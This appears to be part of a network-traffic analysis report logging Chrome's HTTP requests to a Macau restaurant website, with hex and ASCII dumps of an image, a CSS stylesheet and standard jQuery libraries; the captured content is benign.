                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:43.984136105 CET5646INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 506
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:23:36 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "e6543c1da8b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:50 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 0b 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 7d 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 09 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 03 04 05 06 10 00 00 03 05 05 05 09 00 00 00 00 00 00 00 00 00 02 03 04 01 11 12 13 05 00 33 14 15 06 31 51 64 36 07 21 22 32 62 53 a3 d3 24 54 11 00 00 03 04 09 05 00 00 00 00 00 00 00 00 00 00 00 01 11 21 31 12 03 f0 51 61 c1 d1 02 13 33 04 71 81 22 52 a2 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 a8 d4 8d 50 a0 5d 5c a6 74 cd bd 3b 26 ad a7 4f d0 74 ed 48 b3 5a 10 41 4e a7 ad 3d 4a c4 f2 97 08 d6 b0 23 0a 90 a7 64 a6 16 f3 18 30 8d ad 00 cb 8c 64 f2 93 f9 d3 8b 97 9a 51 2c 28 aa ae 69 95 cc c1 cb d4 3d 58 11 88 ab 53 e9 46 26 c0 21 fc 64 73 6e 16 ec 37 1e 96 cf 07 97 65 b6 35 33 56 7b 6b de be a1 a1 2d 27 35 ca e9 b2 f3 a9 78 52 a0 95 95 cb 74 0c 74 13 3b ee dd 17 6e fb 4b 3a 08 f3 2c 2f 3f 7b 81 04 3e df 1d cc dc 25 f7 cb ed 5a df 1b 36 ed 76 1f 40 0f ff d9
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed}31Qd6!"2bS$T!1Qa3q"R?P]\t;&OtHZAN=J#d0dQ,(i=XSF&!dsn7e53V{k-'5xRtt;nK:,/?{>%Z6v@


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              25192.168.2.34970959.188.3.13280C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Mar 13, 2023 05:26:05.826972008 CET615OUTGET /m/static/css/index_ipad.css HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:06.049360037 CET639INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 1837
                                                                                                                                                              Content-Type: text/css
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:20:15 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "6ca245a5a7b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:11 GMT
                                                                                                                                                              Data Raw: 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 30 30 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 38 39 39 70 78 29 7b 0a 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6e 65 77 20 70 72 6f 64 75 63 74 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2a 2f 0a 20 2e 6e 65 77 2d 70 72 6f 64 75 63 74 73 2d 62 6f 78 20 7b 0a 20 09 70 61 64 64 69 6e 67 3a 20 33 30 70 78 20 30 3b 0a 20 7d 0a 20 2e 6e 65 77 2d 70 72 6f 64 75 63 74 73 2d 62 6f 78 20 68 32 20 7b 0a 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 7d 0a 20 2e 6e 65 77 2d 70 72 6f 64 75 63 74 73 20 7b 0a 20 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 20 7d 0a 20 2e 6e 65 77 2d 70 72 6f 64 75 63 74 73 20 68 33 20 7b 0a 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 32 70 78 3b 0a 20 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 34 70 78 3b 0a 20 7d 0a 20 2e 6e 65 77 2d 70 72 6f 64 75 63 74 73 20 70 20 7b 0a 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 36 70 78 3b 0a 20 7d 0a 20 2f 2a e5 b7 a6 e4 be a7 2a 2f 0a 20 2e 70 72 6f 64 75 63 74 2d 6c 65 66 74 20 7b 0a 20 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 34 70 78 3b 0a 20 09 70 61 64 64 69 6e 67 3a 20 32 30 70 78 20 30 3b 0a 20 7d 0a 20 2e 70 72 6f 64 75 63 74 2d 6c 65 66 74 20 70 20 7b 0a 20 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 32 70 78 3b 0a 20 7d 0a 20 2f 2a e5 8f b3 e4 be a7 2a 2f 0a 20 2e 70 72 6f 64 75 63 74 2d 72 69 67 68 74 2d 74 6f 70 20 7b 0a 20 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 7d 0a 20 2e 70 72 6f 64 75 63 74 2d 72 69 67 68 74 20 2e 70 72 6f 64 75 63 74 2d 72 69 67 68 74 2d 63 6f 6e 20 7b 0a 20 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 72 65 6d 3b 0a 20 7d 0a 20 2e 70 72 6f 64 75 63 74 2d 72 69 67 68 74 2d 63 6f 6e 20 2e 72 69 67 68 74 2d 63 6f 6e 2d 74 78 74 20 7b 0a 20 09 77 69 64 74 68 3a 20 35 30 25 3b 0a 20 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 72 65 6d 3b 0a 20 7d 0a 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 e5 95 86 e7 94 a8 e8 a7 a3 e5 86 b3 e6 96 b9 e6 a1 88 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2a 2f 09 0a 2e 73 6f 6c 75 74 69 6f 6e 73 2d 74 69 74 6c 65 20 69 6d 67 20 7b 0a 09 77 69 64 74 68 3a 20 33 30 25 3b 0a 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 20 32 30 70 78 3b 0a 7d 0a 2e 73 6f 6c 75 74 69 6f 6e 73 2d 74 69 74 6c 65 20 68 32 20 7b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 36 50 58 3b 0a 7d 0a 2e 73 6f 6c 75 74 69 6f 6e 73 2d 74 69 74 6c 65 20 70 20 7b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 2e 30 38 33 72 65 6d 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 3b 0a 7d 0a 2e 6c 69 73 74 2d 6e 6f 2d
                                                                                                                                                              Data Ascii: @media screen and (min-width: 600px) and (max-width: 899px){/*----------------new product---------------*/ .new-products-box { padding: 30px 0; } .new-products-box h2 { font-size: 24px; line-height: 24px; } .new-products { margin-top: 20px; } .new-products h3 { font-size: 22px; line-height: 22px; margin-bottom: 14px; } .new-products p { font-size: 16px; line-height: 16px; } /**/ .product-left { margin-bottom: 14px; padding: 20px 0; } .product-left p { margin-bottom: 12px; } /**/ .product-right-top { margin-bottom: 10px; } .product-right .product-right-con { padding-left: 1rem; } .product-right-con .right-con-txt { width: 50%; padding-left: 1rem; }/*--------------- --------------*/.solutions-title img {width: 30%;margin: 0 auto 20px;}.solutions-title h2 {font-size: 24px;line-height: 24px;margin-bottom: 16PX;}.solutions-title p {font-size: 16px;line-height: 24px;margin-bottom: .083rem;padding: 0 20px;}.list-no-
                                                                                                                                                              Mar 13, 2023 05:26:06.049405098 CET640INData Raw: 68 6f 76 65 72 20 68 33 2c 2e 6c 69 73 74 2d 6e 6f 2d 68 6f 76 65 72 2d 65 6e 20 68 33 20 7b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 62 6f 74 74
                                                                                                                                                              Data Ascii: hover h3,.list-no-hover-en h3 {font-size: 24px;line-height: 24px;margin-bottom: 16px;padding-top: 1.7rem;}.list-no-hover img,.list-no-hover-en img {width: 5%;}.list-hover p {font-size: 16px;line-height: 16px;margin-top: 10p
                                                                                                                                                              Mar 13, 2023 05:26:06.051141024 CET640OUTGET /m/static/js/jquery.min.js HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:06.271187067 CET663INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 36651
                                                                                                                                                              Content-Type: application/x-javascript
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:20:22 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "44eb1ba9a7b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:11 GMT
                                                                                                                                                              Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 32 2e 31 2e 31 20 7c 20 28 63 29 20 32 30 30 35 2c 20 32 30 31 34 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 2c 20 49 6e 63 2e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 69 74 68 20 61 20 64 6f 63 75 6d 65 6e 74 22 29 3b 72 65 74 75 72 6e 20 62 28 61 29 7d 3a 62 28 61 29 7d 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 5b 5d 2c 64 3d 63 2e 73 6c 69 63 65 2c 65 3d 63 2e 63 6f 6e 63 61 74 2c 66 3d 63 2e 70 75 73 68 2c 67 3d 63 2e 69 6e 64 65 78 4f 66 2c 68 3d 7b 7d 2c 69 3d 68 2e 74 6f 53 74 72 69 6e 67 2c 6a 3d 68 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 6b 3d 7b 7d 2c 6c 3d 61 2e 64 6f 63 75 6d 65 6e 74 2c 6d 3d 22 32 2e 31 2e 31 22 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 6e 2e 66 6e 2e 69 6e 69 74 28 61 2c 62 29 7d 2c 6f 3d 2f 5e 5b 5c 73 5c 75 46 45 46 46 5c 78 41 30 5d 2b 7c 5b 5c 73 5c 75 46 45 46 46 5c 78 41 30 5d 2b 24 2f 67 2c 70 3d 2f 5e 2d 6d 73 2d 2f 2c 71 3d 2f 2d 28 5b 5c 64 61 2d 7a 5d 29 2f 67 69 2c 72 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 62 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 7d 3b 6e 2e 66 6e 3d 6e 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 6a 71 75 65 72 79 3a 6d 2c 63 6f 6e 73 74 72 75 63 74 6f 72 3a 6e 2c 73 65 6c 65 63 74 6f 72 3a 22 22 2c 6c 65 6e 67 74 68 3a 30 2c 74 6f 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 2e 63 61 6c 6c 28 74 68 69 73 29 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 61 3f 30 3e 61 3f 74 68 69 73 5b 61 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 61 5d 3a 64 2e 63 61 6c 6c 28 74 68 69 73 29 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 6e 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 61 29 3b 72 65 74 75 72 6e 20 62 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 62 2e 63 6f 6e 74 65 78 74 3d 74 68 69 73 2e 63 6f 6e 74 65 78 74 2c 62 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 6e 2e 65 61 63 68 28 74 68 69 73 2c 61 2c 62 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 6e 2e 6d 61 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 20 61 2e
                                                                                                                                                              Data Ascii: /*! jQuery v2.1.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.
                                                                                                                                                              Mar 13, 2023 05:26:06.271249056 CET665INData Raw: 63 61 6c 6c 28 62 2c 63 2c 62 29 7d 29 29 7d 2c 73 6c 69 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 64 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 29 7d 2c 66
                                                                                                                                                              Data Ascii: call(b,c,b)}))},slice:function(){return this.pushStack(d.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c=+a+(0>a?b:0);return this.pushStack(c>=0&&b>c?[this[c]]:
                                                                                                                                                              Mar 13, 2023 05:26:06.271301031 CET666INData Raw: 7b 76 61 72 20 62 3b 66 6f 72 28 62 20 69 6e 20 61 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 74 79 70 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 3f 61 2b 22 22 3a 22 6f 62 6a 65 63 74 22
                                                                                                                                                              Data Ascii: {var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typeof a?h[i.call(a)]||"object":typeof a},globalEval:function(a){var b,c=eval;a=n.trim(a),a&&(1===a.indexOf("use strict")?(b=l.createElem
                                                                                                                                                              Mar 13, 2023 05:26:06.474215984 CET691INData Raw: 75 73 68 28 64 29 3b 65 6c 73 65 20 66 6f 72 28 66 20 69 6e 20 61 29 64 3d 62 28 61 5b 66 5d 2c 66 2c 63 29 2c 6e 75 6c 6c 21 3d 64 26 26 69 2e 70 75 73 68 28 64 29 3b 72 65 74 75 72 6e 20 65 2e 61 70 70 6c 79 28 5b 5d 2c 69 29 7d 2c 67 75 69 64
                                                                                                                                                              Data Ascii: ush(d);else for(f in a)d=b(a[f],f,c),null!=d&&i.push(d);return e.apply([],i)},guid:1,proxy:function(a,b){var c,e,f;return"string"==typeof b&&(c=a[b],b=a,a=c),n.isFunction(a)?(e=d.call(arguments,2),f=function(){return a.apply(b||this,e.concat(d
                                                                                                                                                              Mar 13, 2023 05:26:06.474281073 CET692INData Raw: 5d 22 2c 51 3d 22 3a 28 22 2b 4e 2b 22 29 28 3f 3a 5c 5c 28 28 28 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 29 7c 28 28 3f 3a 5c 5c 5c 5c
                                                                                                                                                              Data Ascii: ]",Q=":("+N+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+P+")*)|.*)\\)|)",R=new RegExp("^"+M+"+|((?:^|[^\\\\])(?:\\\\.)*)"+M+"+$","g"),S=new RegExp("^"+M+"*,"+M+"*"),T=new RegExp("^"+M+"*([>+~]|"+M+")
                                                                                                                                                              Mar 13, 2023 05:26:06.474334955 CET693INData Raw: 29 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 61 2e 6c 65 6e 67 74 68 2c 64 3d 30 3b 77 68 69 6c 65 28 61 5b 63 2b 2b 5d 3d 62 5b 64 2b 2b 5d 29 3b 61 2e 6c 65 6e 67 74 68 3d 63 2d 31 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20
                                                                                                                                                              Data Ascii: ))}:function(a,b){var c=a.length,d=0;while(a[c++]=b[d++]);a.length=c-1}}}function fb(a,b,d,e){var f,h,j,k,l,o,r,s,w,x;if((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,d=d||[],!a||"string"!=typeof a)return d;if(1!==(k=b.nodeType)&&9!==k)return[];if
                                                                                                                                                              Mar 13, 2023 05:26:06.532171965 CET702INData Raw: 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 62 29 2c 62 3d 6e 75 6c 6c 7d 7d 66 75 6e 63 74 69 6f 6e 20 6a 62 28 61 2c 62 29 7b 76 61 72 20 63 3d 61 2e 73 70 6c 69 74 28 22 7c 22
                                                                                                                                                              Data Ascii: parentNode&&b.parentNode.removeChild(b),b=null}}function jb(a,b){var c=a.split("|"),e=a.length;while(e--)d.attrHandle[c[e]]=b}function kb(a,b){var c=b&&a,d=c&&1===a.nodeType&&1===b.nodeType&&(~b.sourceIndex||D)-(~a.sourceIndex||D);if(d)return
                                                                                                                                                              Mar 13, 2023 05:26:06.532236099 CET703INData Raw: 6f 6d 6d 65 6e 74 28 22 22 29 29 2c 21 61 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 2a 22 29 2e 6c 65 6e 67 74 68 7d 29 2c 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 3d 24 2e 74 65 73 74 28
                                                                                                                                                              Data Ascii: omment("")),!a.getElementsByTagName("*").length}),c.getElementsByClassName=$.test(e.getElementsByClassName)&&ib(function(a){return a.innerHTML="<div class='a'></div><div class='a i'></div>",a.firstChild.className="i",2===a.getElementsByClassNa
                                                                                                                                                              Mar 13, 2023 05:26:06.677186966 CET711INData Raw: 65 6c 65 63 74 3e 22 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6d 73 61 6c 6c 6f 77 63 6c 69 70 5e 3d 27 27 5d 22 29 2e 6c 65 6e 67 74 68 26 26 71 2e 70 75 73 68 28 22 5b 2a 5e 24 5d 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c
                                                                                                                                                              Data Ascii: elect>",a.querySelectorAll("[msallowclip^='']").length&&q.push("[*^$]="+M+"*(?:''|\"\")"),a.querySelectorAll("[selected]").length||q.push("\\["+M+"*(?:value|"+L+")"),a.querySelectorAll(":checked").length||q.push(":checked")}),ib(function(a){va
                                                                                                                                                              Mar 13, 2023 05:26:06.677249908 CET712INData Raw: 28 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 29 3f 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 62 29 3a 31 2c 31 26 64 7c 7c 21 63 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 62 2e 63 6f 6d 70 61 72
                                                                                                                                                              Data Ascii: (b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocumentPosition(a)===d?a===e||a.ownerDocument===v&&t(v,a)?-1:b===e||b.ownerDocument===v&&t(v,b)?1:k?K.call(k,a)-K.call(k,b):0:4&d?-1:1)}:function(a,b){if(a===b
                                                                                                                                                              Mar 13, 2023 05:26:07.112852097 CET743OUTGET /m/static/js/jquery-1.11.3.min.js HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:07.353420019 CET745INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 101469
                                                                                                                                                              Content-Type: application/x-javascript
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:20:21 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "8877e7a8a7b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:13 GMT
                                                                                                                                                              Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 31 2e 31 31 2e 33 20 7c 20 28 63 29 20 32 30 30 35 2c 20 32 30 31 35 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 2c 20 49 6e 63 2e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 69 74 68 20 61 20 64 6f 63 75 6d 65 6e 74 22 29 3b 72 65 74 75 72 6e 20 62 28 61 29 7d 3a 62 28 61 29 7d 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 5b 5d 2c 64 3d 63 2e 73 6c 69 63 65 2c 65 3d 63 2e 63 6f 6e 63 61 74 2c 66 3d 63 2e 70 75 73 68 2c 67 3d 63 2e 69 6e 64 65 78 4f 66 2c 68 3d 7b 7d 2c 69 3d 68 2e 74 6f 53 74 72 69 6e 67 2c 6a 3d 68 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 6b 3d 7b 7d 2c 6c 3d 22 31 2e 31 31 2e 33 22 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 6d 2e 66 6e 2e 69 6e 69 74 28 61 2c 62 29 7d 2c 6e 3d 2f 5e 5b 5c 73 5c 75 46 45 46 46 5c 78 41 30 5d 2b 7c 5b 5c 73 5c 75 46 45 46 46 5c 78 41 30 5d 2b 24 2f 67 2c 6f 3d 2f 5e 2d 6d 73 2d 2f 2c 70 3d 2f 2d 28 5b 5c 64 61 2d 7a 5d 29 2f 67 69 2c 71 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 62 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 7d 3b 6d 2e 66 6e 3d 6d 2e 70 72 6f 74 6f 74 